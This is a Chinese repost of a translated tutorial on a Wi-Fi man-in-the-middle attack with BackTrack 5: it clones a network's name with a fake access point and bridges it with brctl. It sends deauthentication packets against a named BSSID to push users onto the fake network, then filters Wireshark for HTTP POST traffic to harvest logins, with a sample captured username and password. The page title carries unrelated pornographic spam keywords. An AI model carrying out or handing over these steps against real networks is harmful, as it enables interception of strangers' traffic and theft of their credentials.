免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP
BT5 wireshark玩wifi捕獲和中間人攻擊
BT5 + wireshark玩wifi捕獲和中間人攻擊
Deepanshu Kapoor 譯者:成王敗寇  FreeBuf  2014-05-13

前言:先說明一下,這個文章不是我寫的,是一個老外(Deepanshu Kapoor)安全專家寫的,我一開始就是看著玩,但整個看完被老外那個細心和耐心給打動了,整個過程其實很簡單,但是老外分了好多步驟來講解,每個步驟都有配圖和說明,甚至命令的參數(shù)都要解釋一下。不得不佩服老外分享和奉獻的精神,所以我也學(xué)著奉獻一下,把它翻譯成中文給大家看看吧,我盡量保持原汁原味,有不恰當?shù)牡胤揭徫遥吘刮也皇菍I(yè)翻譯。

BT5 + wireshark玩wifi數(shù)據(jù)包捕獲和session注入(中間人攻擊)

介紹:

主要思路是通過偽造相同名稱的wifi接入點,配合發(fā)送ARP數(shù)據(jù)包,攻擊連入偽造wifi的用戶。一個與原有wifi相同名稱的偽造接入點一旦建立,會導(dǎo)致用戶從原有鏈接中斷開,并連入你所建立的偽造接入點中,因此所有的通信通道都會流經(jīng)我的系統(tǒng),屆時我們通常會用session注入的方式拿到用戶所有的細節(jié)/授信狀態(tài)/信息等。

必備神器:

1,BT5(Backtrack操作系統(tǒng))

2,虛擬機(帶USB設(shè)備)

3,可聯(lián)網(wǎng)的主機

第一步:

開BT5的terminal終端,然后輸入”iwconfig” 檢查無線網(wǎng)卡。

說明:iwconfig類似于ifconfig,但是是用于無線網(wǎng)絡(luò)的。它經(jīng)常被用來設(shè)置無線網(wǎng)卡的參數(shù)。

第二步:

輸入“airmon-ng start wlan0”開啟無線網(wǎng)卡。

說明:這個命令可以被用來讓無線網(wǎng)卡處于監(jiān)聽狀態(tài)。也可以被用來從監(jiān)聽模式中恢復(fù)成管理模式。輸入 “airmon-ng”不帶參數(shù),可以顯示網(wǎng)卡狀態(tài)。

wlan0 是指wifi網(wǎng)卡。

wlan 是無線局域網(wǎng), 0 是你的網(wǎng)卡編號。

第三步:

在網(wǎng)卡已經(jīng)啟動了監(jiān)聽模式后,輸入“airodump-ng mon0”就可以開始抓包了。

說明:airodump-ng 可以用來抓802.11的原始幀數(shù)據(jù)包,特別適合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能夠用來記錄找到的接入點的坐標。

mon0在監(jiān)聽模式下和wlan0的意思是一樣的。

一旦你把wlan0設(shè)置為監(jiān)聽模式,wlan0就要改為mon0。

第四步:

設(shè)置在airodump-ng中顯示的頻道ID,命令如下:

“iwconfig mon0 channel 5” “iwconfig wlan0 channel 5”

或者

“iwconfig wlan0 channel 5” “iwconfig mon0 channel 5”

說明:參數(shù)“channel”用來選定一個單獨的特殊頻道。

第五步:

現(xiàn)在開始建立你的偽造路由器,命令如下:

“airbase-ng - e “belkin.3448” mon0”

說明:airbase-ng是個多用途的工具,可針對AP(接入點)自身的客戶端進行攻擊,主要的思路是驅(qū)使客戶端去連接偽造的AP,不是阻止客戶端去連接真實AP。

“-e + SSID”指定偽造AP的SSID名稱。

第六步:

現(xiàn)在是時候去“橋接”所有的網(wǎng)絡(luò)了,命令如下:

“brctl addbr mitm”

“brctl addif mitm eth0”

“brctl addif mitm at0”

中間人就是 。(這句話看原文直接翻譯有些難以理解,實際上作者就是想說at0這個網(wǎng)卡架起來的網(wǎng)橋就是個中間人,攻擊就是在這里完成的?!C譯者注)

說明:

Brctl 用來在兩個網(wǎng)卡之間建立橋接網(wǎng)絡(luò)。

Addbr 用來添加網(wǎng)橋的對象,用來指定網(wǎng)橋的名稱。

Addif 給已經(jīng)使用addbr創(chuàng)建的網(wǎng)橋中添加一個網(wǎng)卡,后邊的參數(shù)使用你要添加的網(wǎng)卡名稱即可。

第七步:

現(xiàn)在創(chuàng)建一個新的網(wǎng)卡配置,命令如下:

“ifconfig eth0 0.0.0.0 up”

“ifconfig at0 0.0.0.0 up”

說明:ifconfig 不用多說了,用來配置網(wǎng)卡,大家經(jīng)常用的。

第八步:

現(xiàn)在可以啟動我們用來做中間人攻擊的網(wǎng)橋了!命令如下:

“ifconfig mitm up”

說明:配置完成的網(wǎng)橋可以使用ifconfig來啟用。

第九步:

現(xiàn)在使用下面的命令發(fā)送認證包到路由器上,

“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”

說明:aireplay-ng 用來注入幀數(shù)據(jù)。

-a 指定被攻擊者的BSSID。

94:44:52:DA:B4:28這個是被攻擊者的BSSID。

第十步:

現(xiàn)在開始給被攻擊者分配IP,命令如下:

“dhclient3 mitm&” 或者 “dhclient3 mitm &”

說明:

使用類似DHCP的協(xié)議方式分配IP。

第十一步:

現(xiàn)在你可以看看是不是有客戶端已經(jīng)連接上了,有的話會顯示在第五步的那個命令終端里面。

第十二步:

開wireshark,命令:“wireshark&”

說明:wireshark是個網(wǎng)絡(luò)協(xié)議抓包分析器。

第十三步:

選擇網(wǎng)卡,點開始(start)

第十四步:

輸入 “http contains POST”過濾一下,然后你就可以看到所有抓下來的數(shù)據(jù)包了。

http://exploit.deepanshukapoor.org/admin.php

Username – john

Password – 1234

 

【編輯推薦】

【責任編輯:藍雨淚 TEL:(010)68476606】
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊舉報。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
由HTTPS抓包引發(fā)的一系列思考
無線網(wǎng)絡(luò)嗅探中的Radiotap
Kali Linux:高級WLAN攻擊
如何使用Wireshark抓包
Android抓包方法(三) 之Win7筆記本W(wǎng)ifi熱點+WireShark工具
Linux下抓包工具tcpdump以及分析包的工具wireshark
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服